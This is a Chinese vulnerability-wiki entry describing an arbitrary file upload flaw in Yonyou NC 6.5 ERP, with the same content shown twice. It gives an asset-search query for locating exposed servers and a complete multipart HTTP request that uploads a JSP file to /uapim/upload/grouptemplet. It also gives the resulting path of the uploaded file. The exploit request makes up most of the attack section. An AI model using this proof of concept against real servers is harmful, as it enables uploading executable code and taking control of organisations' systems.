fofamini-wiki

登录白背景

源码

用友NC uapim任意文件上传

一、漏洞简介

用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。该产品存在文件上传漏洞，攻击者可利用该漏洞获取服务器控制权限。

二、影响版本

用友NC6.5

三、资产测绘

huiter：app.name=="用友 UAP"

登录页面

四、漏洞复现

POST /uapim/upload/grouptemplet?groupid=abc&fileType=jsp HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_371
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 122
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="test.jsp"

test
--00content0boundary00--

上传文件位置：/uapim/static/pages/abc/head.jsp,其中heade.jsp为固定文件。

原文: https://www.yuque.com/xiaokp7/ocvun2/deq2n5onf5s36s56

# 用友NC uapim任意文件上传

# 一、漏洞简介
用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。 该产品存在文件上传漏洞，攻击者可利用该漏洞获取服务器控制权限。

# 二、影响版本

- 用友NC6.5

# 三、资产测绘

- huiter：`app.name=="用友 UAP"`

![image.png](./img/4r2I01Ccrnbm1yQD/1691729367315-f00b542f-0929-41cc-8671-84149242ffca-957367.png)

- 登录页面

![image.png](./img/4r2I01Ccrnbm1yQD/1691729393165-7891d318-bbd8-4761-87d4-76fee42778ec-490866.png)

# 四、漏洞复现
```java
POST /uapim/upload/grouptemplet?groupid=abc&fileType=jsp HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_371
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 122
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="test.jsp"

test
--00content0boundary00--
```
![image.png](./img/4r2I01Ccrnbm1yQD/1691731493664-9056f801-59cd-4461-8e52-31520519e7ee-171946.png)
上传文件位置：`/uapim/static/pages/abc/head.jsp`,其中`heade.jsp`为固定文件。
![image.png](./img/4r2I01Ccrnbm1yQD/1691731525404-7eaef3fc-30ff-44bf-b55a-04f97bcbd796-125804.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/deq2n5onf5s36s56>